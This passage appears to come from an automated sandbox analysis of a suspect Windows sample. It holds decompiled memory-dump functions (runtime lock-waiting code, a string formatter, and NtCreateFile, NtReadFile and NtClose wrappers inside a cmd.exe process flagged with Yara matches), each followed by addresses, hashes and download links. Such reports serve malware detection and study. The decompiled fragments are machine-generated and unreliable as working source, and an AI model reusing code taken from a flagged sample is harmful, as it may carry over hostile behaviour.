								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009601c0;
									_push(_t144);
									_push(0);
									_t51 = E0087F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L008C4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L008D3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L008D3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0090217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L008D3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E008C3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009601c0;
												_push(_t138);
												_push(0);
												_t58 = E0087F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L008C4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L008D3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L008D3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0090217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L008D3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E008C3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E008A5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0087F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E008C3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0087F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E008C3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0087F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E008C3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E008A5329(_t110, _t138);
																return E008A53A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x008c055a
0x008c055d
0x008c0563
0x008c0566
0x008c05d8
0x008c05e2
0x008c05e5
0x00000000
0x008c05e7
0x008c05e7
0x008c05ea
0x008c05f3
0x008c05f3
0x008c0568
0x008c0568
0x008c0568
0x008c0569
0x008c0569
0x008c0569
0x008c056b
0x00000000
0x00000000
0x008e217f
0x008e2183
0x008e225b
0x008e225f
0x008e2189
0x008e218c
0x008e218f
0x008e2194
0x008e2199
0x008e219d
0x008e21a0
0x008e21a2
0x008e21ce
0x008e21ce
0x008e21ce
0x008e21d0
0x008e21d6
0x008e21de
0x008e21e2
0x008e21e8
0x008e21e9
0x008e21ec
0x008e21f1
0x008e21f6
0x00000000
0x00000000
0x008e21f8
0x008e21fb
0x008e2206
0x008e220b
0x008e220c
0x008e2217
0x008e2226
0x008e222b
0x008e222c
0x008e222f
0x008e2232
0x008e2235
0x008e2235
0x008e223a
0x008e223f
0x008e2241
0x008e2243
0x008e2248
0x008e2248
0x008e224d
0x008e224f
0x008e2262
0x008e2263
0x008e2268
0x008e2269
0x008e2269
0x008e2269
0x008e226d
0x00000000
0x00000000
0x008e2276
0x008e2279
0x008e227e
0x008e2283
0x008e2287
0x008e228a
0x008e228d
0x008e228f
0x008e22bc
0x008e22bc
0x008e22bc
0x008e22be
0x008e22c4
0x008e22cc
0x008e22d0
0x008e22d6
0x008e22d7
0x008e22da
0x008e22df
0x008e22e4
0x00000000
0x00000000
0x008e22e6
0x008e22e9
0x008e22f4
0x008e22f9
0x008e22fa
0x008e2305
0x008e2314
0x008e2319
0x008e231a
0x008e231d
0x008e2320
0x008e2323
0x008e2323
0x008e2328
0x008e232d
0x008e232f
0x008e2331
0x008e2336
0x008e2336
0x008e233b
0x008e233d
0x008e2350
0x008e2351
0x008e2356
0x008e2359
0x008e2359
0x008e235b
0x008e235d
0x008a5367
0x008a536b
0x008a5372
0x00000000
0x00000000
0x00000000
0x00000000
0x008e2363
0x008e2363
0x008e2369
0x008e236a
0x008e236c
0x008e2371
0x008e2373
0x00000000
0x008e2379
0x008e2379
0x008e237a
0x008e237f
0x008e237f
0x008e2385
0x008e2386
0x008e2389
0x008e238e
0x008e2390
0x008a5378
0x008a537c
0x008e2396
0x008e2396
0x008e2397
0x008e239c
0x008e23a2
0x008e23a3
0x008e23a6
0x008e23ab
0x008e23ad
0x00000000
0x008e23b3
0x008e23b3
0x008e23b4
0x008e23b9
0x008e23ba
0x008e23ba
0x008e23bc
0x008e23bf
0x00000000
0x00000000
0x008d9153
0x008d9158
0x008d915a
0x008d915e
0x008d9160
0x00000000
0x008d9166
0x008d9166
0x008d9171
0x008d9176
0x008d9176
0x00000000
0x008d9160
0x008e23c6
0x008e23d7
0x008e23d7
0x008e23ad
0x008e2390
0x008e2373
0x008e233f
0x008e233f
0x00000000
0x008e233f
0x008e2291
0x008e2291
0x008e2293
0x008e2295
0x008e229a
0x008e22a1
0x008e22a3
0x008e22a7
0x008e22a9
0x00000000
0x00000000
0x008e22ab
0x008e22ad
0x008e22af
0x00000000
0x00000000
0x00000000
0x008e22af
0x008e22b1
0x008e22b4
0x008e22b4
0x008e22b6
0x008a53be
0x008a53be
0x008a53be
0x008a53c0
0x00000000
0x00000000
0x008a53cb
0x008a53ce
0x008a53d0
0x008a53d4
0x008a53d6
0x00000000
0x008a53d8
0x008a53e3
0x008a53ea
0x008a53ea
0x00000000
0x008a53d6
0x00000000
0x00000000
0x00000000
0x00000000
0x008e22b6
0x00000000
0x008e228f
0x008e2349
0x008e234d
0x008e2251
0x008e2251
0x00000000
0x008e2251
0x008e21a4
0x008e21a4
0x008e21a6
0x008e21a8
0x008e21ac
0x008e21b6
0x008e21b8
0x008e21bc
0x008e21be
0x00000000
0x00000000
0x008e21c0
0x008e21c2
0x008e21c4
0x00000000
0x00000000
0x00000000
0x008e21c4
0x008e21c6
0x008e21c6
0x008e21c8
0x00000000
0x00000000
0x00000000
0x00000000
0x008e21c8
0x008e21a2
0x00000000
0x008e2183
0x008c057b
0x008c057d
0x008c0581
0x008c0583
0x008e2178
0x00000000
0x008c0589
0x008c058f
0x008c058f
0x008c0583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E2206

Strings

RTL: Re-Waiting, xrefs: 008E223A, 008E2328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008E22FC
RTL: Resource at %p, xrefs: 008E221D, 008E230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 008E220E

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 6ece75c1fc82017da88f325dca87c8db0320a037a5ad45c8cb40a0f33bd57572
Instruction ID: 9370d6c57b9bafe922966190555a88ba70e3a807648f5901659822d51d1fe5d7
Opcode Fuzzy Hash: 6ece75c1fc82017da88f325dca87c8db0320a037a5ad45c8cb40a0f33bd57572
Instruction Fuzzy Hash: AC515971B002456BEB249B19CC82F6673ADFF85710F218269FD14DB385E931EC418BA1

Uniqueness

Uniqueness Score: -1.00%

Function 008C14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E008C14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x962088; // 0x775dafcd
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E008B7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E008C13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E008B7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E008B7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00882340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0088E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x008c14c0
0x008c14cb
0x008c14d2
0x008c14d6
0x008c14da
0x008c14de
0x008c14e3
0x008c157a
0x008c157a
0x008c14f1
0x008c14f3
0x008eea0f
0x00000000
0x008eea15
0x00000000
0x008eea15
0x008c14f9
0x008c14f9
0x008c14fe
0x008c1504
0x008eea1a
0x008eea1f
0x008eea21
0x008eea22
0x008eea27
0x008eea2a
0x008eea2a
0x008c1515
0x008c1517
0x008c156d
0x008c1572
0x008c1575
0x008c1575
0x008c151e
0x008eea50
0x008eea55
0x008eea58
0x008eea58
0x008c152e
0x008c1531
0x008c1533
0x00000000
0x008c1535
0x008c1541
0x008c1549
0x008c1549
0x008c1533
0x008c14f3
0x008c1559

APIs

___swprintf_l.LIBCMT ref: 008EEA22

Part of subcall function 008C13CB: ___swprintf_l.LIBCMT ref: 008C146B
Part of subcall function 008C13CB: ___swprintf_l.LIBCMT ref: 008C1490

___swprintf_l.LIBCMT ref: 008C156D

Strings

]:%u, xrefs: 008EEA47
%%%u, xrefs: 008C1564

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 4d0e69503c5c58f4b4a2447da1d7edf2f084c625ac885e37f0bfdc7ae825fe81
Instruction ID: 59f404ca7fc0b26f684ea4dc7bb352404320c3bd97eebb5d670a4339af528709
Opcode Fuzzy Hash: 4d0e69503c5c58f4b4a2447da1d7edf2f084c625ac885e37f0bfdc7ae825fe81
Instruction Fuzzy Hash: E72184729006199BCF21EE58CC85FEA73BCFB91704F544159F846D3241DB74EA588BD1

Uniqueness

Uniqueness Score: -1.00%

Function 008A53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E22F4

Strings

RTL: Re-Waiting, xrefs: 008E2328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008E22FC
RTL: Resource at %p, xrefs: 008E230B

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 75bb36dca9921d5b358113db27abea90da5bb5ca019774f7dcbdcefa8bff5a76
Instruction ID: 2ca0ade7d821966cbdedf6cd2ddefee1e062d6349907fe140793985e9ff74962
Opcode Fuzzy Hash: 75bb36dca9921d5b358113db27abea90da5bb5ca019774f7dcbdcefa8bff5a76
Instruction Fuzzy Hash: 1F5128716006056BEF11DB29CC81FA673ACFF96360F104229FD18DB781EA71EC818BA1

Uniqueness

Uniqueness Score: -1.00%

Function 008BFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 008BFD94

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 28194a3dfc470fb678315caf02e57ff23b3c3bc52870c8b9adf1ee0c02fb5190
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: CA915971D0024AEBDF24DFA9C8456FEB7B4FF55318F24807AD511EA263E7309A818B91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmd.exe PID: 2724 Parent PID: 1764 cmd.exeCOMMON

Executed Functions

Function 000986DA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(@=,?,?,00093D40,00000000,FFFFFFFF), ref: 00098705

Strings

m;, xrefs: 000986D4
@=, xrefs: 000986FC, 00098704

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: @=$m;
API String ID: 3535843008-1185082243
Opcode ID: 6cf120370936278f00b116b0e8d1e9d7e862436aff26ade48e795f4217cb668d
Instruction ID: 414a7036656e8f198db2c382d883a721f13b42f6203ebd5dc8a5a58293b1a342
Opcode Fuzzy Hash: 6cf120370936278f00b116b0e8d1e9d7e862436aff26ade48e795f4217cb668d
Instruction Fuzzy Hash: 71E092722401146BDB10EBE89C85EEB7768EF84750F118569FA5CAB242C931A2118AE0

Uniqueness

Uniqueness Score: -1.00%

Function 000985AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00093BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000985FD

Strings

.z`, xrefs: 000985ED, 000985F8

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: dac9615a8c8aa45dcc6329a0831157119820a3bd4bf830656e873f0e7c655f8d
Instruction ID: 3b6d84ef3f3adbecb04eb7d1bc3e2a81b9882c98a6db7e614595e8ba54d86d49
Opcode Fuzzy Hash: dac9615a8c8aa45dcc6329a0831157119820a3bd4bf830656e873f0e7c655f8d
Instruction Fuzzy Hash: 6B01CFB6241208AFDB48DF88DC85EEB77A9FF8C354F158258FA1D97241D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000985B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00093BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000985FD

Strings

.z`, xrefs: 000985ED, 000985F8

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 1de84a8c26ebc7edd3a087416065dc0c436bebed3768d0cfcb9c803ae6bcc167
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: E5F0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00098660, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000986A5

Strings

!:, xrefs: 0009867C, 00098688

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: !:
API String ID: 2738559852-2595984152
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 42a30f2ef5156c0618ecd3b7f0fe7c448ee075f7671ce12c6632b566645b51a6
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: EDF0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97255DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000986E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(@=,?,?,00093D40,00000000,FFFFFFFF), ref: 00098705

Strings

@=, xrefs: 000986FC, 00098704

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: @=
API String ID: 3535843008-2632950984
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: f87540569f30c08a7b2809185a3ce9d153d9c9dab6d2862f9557835a10c29ec1
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: EED01776200214ABDB10EB99CC89EE77BADEF48760F154499BA189B242C930FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 023500C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 023500CF

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 023507AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 023507B7

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0234FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0234FAF3

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0234FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0234FB73

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File
